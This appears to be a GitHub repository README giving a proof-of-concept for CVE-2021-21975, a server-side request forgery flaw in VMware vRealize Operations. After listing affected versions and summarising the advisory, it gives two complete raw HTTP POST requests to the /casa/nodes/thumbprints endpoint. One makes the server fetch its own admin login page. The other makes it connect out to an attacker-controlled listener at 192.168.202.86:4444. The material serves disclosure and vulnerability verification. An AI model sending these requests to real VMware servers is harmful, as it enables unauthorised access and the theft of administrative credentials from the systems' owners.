├── README.md └── img ├── request.png ├── request2.png └── without_login.png /README.md: -------------------------------------------------------------------------------- 1 | ## Impacted Products 2 | 3 | - VMware vRealize Operations 8.3.0、8.2.0、8.1.1、8.1.0、7.5.0 4 | - VMware Cloud Foundation 4.x、3.x 5 | - vRealize Suite Lifecycle Manager 8.x 6 | 7 | ## Description 8 | 9 | On March 31, 2021, VMware officially released the risk notice of vmsa-2021-0004. The vulnerability numbers are cve-2021-21975 and cve-2021-21983. The vulnerability level is high risk and the vulnerability score is 8.6. 10 | 11 | CVE-2021-21975:A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials. 12 | 13 | CVE-2021-21983:An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system 14 | 15 | ## Vulnerability 16 | 17 | **Step 1**:login out 18 | 19 | ![without_login](./img/without_login.png) 20 | 21 | **Step 2**:After that, visit /casa/nodes/thumbprints and use burpsuite to grab the data packet to construct the following request data packet to make the server request to log in to theauthentication page 22 | 23 | ```java 24 | POST /casa/nodes/thumbprints HTTP/1.1 25 | Host: 192.168.203.155 26 | Connection: close 27 | Cache-Control: max-age=0 28 | sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99" 29 | sec-ch-ua-mobile: ?0 30 | Upgrade-Insecure-Requests: 1 31 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 32 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 33 | Content-Type: application/json;charset=UTF-8 34 | Sec-Fetch-Site: none 35 | Sec-Fetch-Mode: navigate 36 | Sec-Fetch-User: ?1 37 | Sec-Fetch-Dest: document 38 | Accept-Encoding: gzip, deflate 39 | Accept-Language: zh-CN,zh;q=0.9 40 | Content-Length: 36 41 | 42 | ["127.0.0.1:443/admin/login.action"] 43 | ``` 44 | 45 | ![request](img/request.png) 46 | 47 | **Step 2**: When using dnslog to verify SSRF, it was found that there was no echo for a long time, and then it had no choice but to use NC for verification. The construction request packet is as follows: 48 | 49 | ```java 50 | POST /casa/nodes/thumbprints HTTP/1.1 51 | Host: 192.168.203.155 52 | Connection: close 53 | Cache-Control: max-age=0 54 | sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99" 55 | sec-ch-ua-mobile: ?0 56 | Upgrade-Insecure-Requests: 1 57 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 58 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 59 | Content-Type: application/json;charset=UTF-8 60 | Sec-Fetch-Site: none 61 | Sec-Fetch-Mode: navigate 62 | Sec-Fetch-User: ?1 63 | Sec-Fetch-Dest: document 64 | Accept-Encoding: gzip, deflate 65 | Accept-Language: zh-CN,zh;q=0.9 66 | Content-Length: 23 67 | 68 | ["192.168.202.86:4444"] 69 | ``` 70 | 71 | ![request2](img/request2.png) 72 | 73 | ## Reference 74 | 75 | https://kb.vmware.com/s/article/83210 76 | 77 | https://www.vmware.com/security/advisories/VMSA-2021-0004.html 78 | 79 | https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml 80 | -------------------------------------------------------------------------------- /img/request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Al1ex/CVE-2021-21975/dfde77d5bd1d6ff94ace1666fbe8dd8492fc9678/img/request.png -------------------------------------------------------------------------------- /img/request2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Al1ex/CVE-2021-21975/dfde77d5bd1d6ff94ace1666fbe8dd8492fc9678/img/request2.png -------------------------------------------------------------------------------- /img/without_login.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Al1ex/CVE-2021-21975/dfde77d5bd1d6ff94ace1666fbe8dd8492fc9678/img/without_login.png --------------------------------------------------------------------------------